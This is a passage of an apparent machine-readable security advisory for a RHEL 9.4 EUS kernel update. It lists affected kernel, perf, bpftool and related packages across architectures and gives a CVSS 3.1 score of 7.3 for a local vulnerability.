"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
